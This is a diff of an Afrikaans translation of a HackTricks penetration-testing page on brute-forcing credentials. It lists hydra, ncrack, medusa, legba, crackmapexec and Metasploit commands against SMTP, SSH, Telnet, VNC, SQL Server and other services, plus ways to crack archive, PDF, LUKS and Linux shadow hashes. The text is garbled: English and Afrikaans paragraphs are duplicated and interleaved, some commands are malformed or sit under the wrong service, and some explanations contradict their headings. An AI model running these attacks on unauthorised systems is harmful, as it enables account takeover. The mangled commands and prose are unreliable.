Brute force attacks against SMTP servers involve attempting to guess valid usernames and passwords by systematically trying all possible combinations. This is typically achieved using automated tools that can rapidly try different combinations until the correct one is found.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To protect against brute force attacks on SMTP servers, it is essential to implement strong password policies, such as requiring complex passwords and enforcing account lockout policies after a certain number of failed login attempts. Additionally, implementing rate limiting on login attempts can help prevent automated tools from successfully brute forcing credentials.
|
||||
SMTP (Simple Mail Transfer Protocol) is 'n protokol wat gebruik word vir die stuur van e-posse oor 'n netwerk.
|
||||
```bash
|
||||
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
|
||||
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
|
||||
|
@ -513,14 +544,24 @@ legba smtp --username admin@example.com --password wordlists/passwords.txt --tar
|
|||
```
|
||||
### SOCKS
|
||||
|
||||
SOCKS is a protocol that routes network packets between a client and a server through a proxy server. It can be used in brute force attacks to hide the attacker's IP address and location.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is often used when other techniques, such as dictionary attacks, fail to crack a password. Brute force attacks can be time-consuming but are effective against weak passwords. It is important to note that using brute force attacks against a system without permission is illegal and unethical.
|
||||
|
||||
#### Afrikaans Translation
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force-aanvalle behels om alle moontlike kombinasies van 'n wagwoord te probeer totdat die regte een gevind word. Hierdie metode word dikwels gebruik wanneer ander tegnieke, soos woordeboekaanvalle, nie slaag om 'n wagwoord te kraak nie. Brute force-aanvalle kan tydrowend wees, maar is effektief teen swak wagwoorde. Dit is belangrik om daarop te let dat die gebruik van brute force-aanvalle teen 'n stelsel sonder toestemming onwettig en oneties is.
|
||||
```bash
|
||||
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
|
||||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
|
||||
# With alternative address
|
||||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
|
||||
```
|
||||
### SQL-bediener
|
||||
### SQL Server
|
||||
|
||||
Brute-force attacks against SQL Server can be performed using various tools such as Hydra, Ncrack, and Metasploit. These tools allow attackers to systematically check a large number of passwords until the correct one is found. It is important to use strong and complex passwords to protect SQL Server databases from brute-force attacks.
|
||||
```bash
|
||||
#Use the NetBIOS name of the machine as domain
|
||||
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
|
@ -533,7 +574,7 @@ msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is commonly used to gain unauthorized access to SSH servers. Attackers use automated tools to systematically try different passwords until they find the right one. To protect against brute force attacks, it is essential to use strong, complex passwords and implement security measures such as account lockouts after multiple failed login attempts.
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective if the credentials are weak. It is important to use strong, unique passwords and implement account lockout policies to prevent brute force attacks.
|
||||
```bash
|
||||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||||
|
@ -545,17 +586,17 @@ legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --targ
|
|||
```
|
||||
#### Swakke SSH-sleutels / Debian voorspelbare PRNG
|
||||
|
||||
Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n dramaties verminderde sleutelruimte wat met gereedskap soos [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
||||
Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n aansienlik verminderde sleutelruimte wat met gereedskap soos [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
||||
|
||||
### STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ)
|
||||
|
||||
Die STOMP-teksprotokol is 'n wyd gebruikte boodskapprotokol wat **naadlose kommunikasie en interaksie met gewilde boodskie-opeenhopingsdiens** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapoperasies uit te voer.
|
||||
Die STOMP-teksprotokol is 'n wyd gebruikte boodskapprotokol wat **naadlose kommunikasie en interaksie met gewilde boodskie-opeenhopingsdiens** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapbedrywighede uit te voer.
|
||||
```bash
|
||||
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
|
||||
```
|
||||
### Telnet
|
||||
|
||||
Telnet is 'n netwerkprotokol wat gebruik word om 'n verbindingsessie met 'n ander rekenaar te skep. Dit kan gebruik word vir die uitvoering van brute force-aanvalle deur verskeie aanmeldingskombinasies te probeer totdat die regte een gevind word.
|
||||
Telnet is 'n onveilige protokol wat gebruik kan word om te kommunikeer met 'n bediener deur middel van 'n opdraglyn. Dit kan gebruik word vir brute force-aanvalle deur verskeie aanmeldingspogings te probeer totdat die regte wagwoord gevind word.
|
||||
```bash
|
||||
hydra -l root -P passwords.txt [-t 32] <IP> telnet
|
||||
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
|
||||
|
@ -572,14 +613,16 @@ legba telnet \
|
|||
```
|
||||
### VNC
|
||||
|
||||
VNC, of Virtual Network Computing, is a graphical desktop sharing system that allows you to remotely control another computer. VNC is often used in penetration testing to gain access to a target system. One common method is to perform a brute force attack on the VNC password to gain unauthorized access.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against VNC servers are common due to the protocol's lack of built-in security features. Attackers can use tools like Hydra or Medusa to automate the process of trying different username and password combinations until the correct one is found. It is essential to use strong, unique credentials and consider additional security measures such as IP whitelisting or VPNs to protect VNC servers from brute force attacks.
|
||||
```bash
|
||||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
|
||||
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
|
||||
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
|
||||
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
|
||||
use auxiliary/scanner/vnc/vnc_login
|
||||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||||
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
|
||||
legba vnc --target localhost:5901 --password data/passwords.txt
|
||||
|
||||
#Metasploit
|
||||
|
@ -594,8 +637,8 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
|||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou** en outomatiseer met die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Toegang Vandag:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou** en te **outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
@ -650,7 +693,7 @@ unzip unlocked.zip #User new_pwd as password
|
|||
```
|
||||
### 7z
|
||||
|
||||
Brute-forcing a password-protected 7z file can be achieved using tools like `7z2hashcat` or `hashcat`. These tools can convert the 7z file's password hash into a format that can be cracked using brute-force techniques.
|
||||
Brute-force attacks against encrypted 7z files can be time-consuming and resource-intensive. Tools like 7z2hashcat can convert 7z files to hashcat formats for easier cracking. Additionally, using a powerful GPU can significantly speed up the brute-force process.
|
||||
```bash
|
||||
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
|
||||
```
|
||||
|
@ -663,7 +706,7 @@ apt-get install libcompress-raw-lzma-perl
|
|||
```
|
||||
### PDF
|
||||
|
||||
Brute-force attacks are commonly used to crack passwords from PDF files. Tools like `pdfcrack` and `hashcat` can be used to perform brute-force attacks on encrypted PDF files. These tools work by trying all possible combinations of characters until the correct password is found. It is important to note that brute-force attacks can be time-consuming and resource-intensive, especially for complex passwords.
|
||||
Brute-force attacks are commonly used to crack passwords from PDF files. Tools like `pdfcrack` and `pdf2john` can be used to extract the hash from a PDF file, which can then be cracked using tools like `John the Ripper` or `hashcat`. These tools use brute-force techniques to try all possible combinations of characters until the correct password is found. It is important to use strong and complex passwords to protect PDF files from brute-force attacks.
|
||||
```bash
|
||||
apt-get install pdfcrack
|
||||
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
|
||||
|
@ -728,9 +771,9 @@ cryptsetup luksOpen backup.img mylucksopen
|
|||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||||
mount /dev/mapper/mylucksopen /mnt
|
||||
```
|
||||
'n Ander Luks BF handleiding: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
||||
|
||||
### Mysql
|
||||
|
||||
'n Ander Luks BF-handleiding: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
||||
```bash
|
||||
#John hash format
|
||||
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
|
||||
|
@ -745,9 +788,9 @@ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
|
|||
|
||||
<figure><img src="../.gitbook/assets/image (660).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### DPAPI Meestersleutel
|
||||
### DPAPI Meester Sleutel
|
||||
|
||||
Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) en hardloop dan john
|
||||
Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) en dan john
|
||||
|
||||
### Open Office Wagwoord Beskermde Kolom
|
||||
|
||||
|
@ -773,7 +816,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
|||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) om maklik en **outomatiseer werkstrome** te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) om maklik **werkstrome te bou** en te **outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
@ -875,51 +918,64 @@ hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
|||
```bash
|
||||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||||
```
|
||||
### Brute Forcing Linux Hashes - /etc/shadow lêer
|
||||
### Brute Force
|
||||
|
||||
Brute forcing is 'n aanvalstegniek wat gebruik word om wagtwoorde te agterhaal deur verskeie kombinasies van moontlike wagtwoorde te probeer. Vir Linux-stelsels kan die /etc/shadow-lêer 'n bron wees van gehashde wagtwoorde wat aangeval kan word deur 'n brute force-aanval uit te voer. Met die regte gereedskap en tegnieke kan 'n aanvaller poog om hierdie gehashde wagtwoorde te ontsyfer en toegang tot die stelsel te verkry.
|
||||
Brute force attacks involve trying all possible combinations of characters until the correct password is found. This method is commonly used to crack Linux password hashes stored in the `/etc/shadow` file.
|
||||
|
||||
### Brute Force
|
||||
|
||||
Brute force-aanvalle behels om alle moontlike kombinasies van karakters te probeer totdat die regte wagwoord gevind word. Hierdie metode word dikwels gebruik om Linux-wagwoordhasies wat in die `/etc/shadow`-lêer gestoor word, te kraak.
|
||||
```
|
||||
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
|
||||
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
|
||||
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
|
||||
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
|
||||
```
|
||||
### Brute-Force Attack
|
||||
### Brute-Force
|
||||
|
||||
#### Description
|
||||
|
||||
A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.
|
||||
Brute-force attacks are a common method used to crack passwords. This technique involves trying all possible combinations of characters until the correct password is found. Brute-force attacks can be time-consuming but are often successful, especially with the use of powerful computers or specialized software.
|
||||
|
||||
#### Tools
|
||||
|
||||
- **John the Ripper**: A popular password-cracking tool that can perform brute-force attacks.
|
||||
- **Hashcat**: Another powerful password-cracking tool that supports various algorithms and attack types.
|
||||
There are several tools available for conducting brute-force attacks on Windows hashes. Some popular tools include:
|
||||
|
||||
#### Techniques
|
||||
- **John the Ripper**: A powerful password-cracking tool that can be used for various types of hashes, including Windows hashes.
|
||||
- **Hashcat**: Another popular tool for password cracking that supports a wide range of hash types, including Windows hashes.
|
||||
- **Hydra**: A versatile password-cracking tool that supports multiple protocols, including SMB, which can be used to crack Windows hashes.
|
||||
|
||||
1. **Dictionary Attack**: Involves using a predefined list of words to crack passwords.
|
||||
2. **Mask Attack**: Allows for more complex password variations by defining a mask with placeholders for characters.
|
||||
3. **Hybrid Attack**: Combines dictionary words with brute-force techniques to increase the chances of success.
|
||||
#### Methodology
|
||||
|
||||
When conducting a brute-force attack on Windows hashes, it is essential to use a good wordlist that includes common passwords, as well as variations and combinations of words. Additionally, utilizing rulesets can help increase the efficiency of the attack by applying specific transformations to the words in the wordlist.
|
||||
|
||||
#### Resources
|
||||
|
||||
- [John the Ripper GitHub Repository](https://github.com/magnumripper/JohnTheRipper)
|
||||
- [Hashcat GitHub Repository](https://github.com/hashcat/hashcat)
|
||||
- [John the Ripper](https://www.openwall.com/john/)
|
||||
- [Hashcat](https://hashcat.net/hashcat/)
|
||||
- [Hydra](https://github.com/vanhauser-thc/thc-hydra)
|
||||
```
|
||||
3000 | LM | Operating-Systems
|
||||
1000 | NTLM | Operating-Systems
|
||||
```
|
||||
### Brute Force
|
||||
### Brute-Force
|
||||
|
||||
Brute force is a common method used to crack hashes. It involves trying all possible combinations of characters until the correct one is found. This method is time-consuming but can be effective, especially for simpler passwords. There are tools available that can automate the brute force process, such as John the Ripper and Hashcat.
|
||||
Brute-force attacks involve trying all possible combinations of characters until the correct one is found. This method is commonly used to crack common application hashes, such as MD5 or SHA-1.
|
||||
|
||||
### Dictionary Attacks
|
||||
#### Tools and Resources
|
||||
|
||||
Dictionary attacks involve using a list of commonly used passwords or words from a dictionary to try to crack hashes. This method is more efficient than brute force as it focuses on likely passwords first. Tools like Hashcat and Hydra can be used to perform dictionary attacks.
|
||||
- **Hashcat**: A popular password cracking tool that supports multiple hashing algorithms.
|
||||
- **John the Ripper**: Another widely used password cracking tool that can perform brute-force attacks.
|
||||
- **CrackStation**: An online database containing pre-computed hash values for common passwords, which can help in cracking hashes more quickly.
|
||||
|
||||
### Rainbow Tables
|
||||
#### Methodology
|
||||
|
||||
Rainbow tables are precomputed tables used to crack hashes quickly. They contain a list of hashes and their corresponding plaintext passwords. By comparing the hash to the values in the rainbow table, the plaintext password can be quickly identified. Tools like RainbowCrack can be used to leverage rainbow tables in password cracking.
|
||||
1. Obtain the hash value of the target application.
|
||||
2. Choose a password cracking tool like Hashcat or John the Ripper.
|
||||
3. Configure the tool to use the appropriate hashing algorithm (e.g., MD5, SHA-1).
|
||||
4. Start the brute-force attack by specifying the character set and length of the password.
|
||||
5. Monitor the progress of the attack and wait for the tool to find the correct password.
|
||||
6. Once the password is found, use it to access the application or system.
|
||||
|
||||
By following this methodology, hackers can effectively crack common application hashes using brute-force techniques.
|
||||
```
|
||||
900 | MD4 | Raw Hash
|
||||
0 | MD5 | Raw Hash
|
||||
|
@ -935,18 +991,18 @@ Rainbow tables are precomputed tables used to crack hashes quickly. They contain
|
|||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kontroleer die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou en outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **werkstrome outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
Loading…
Reference in a new issue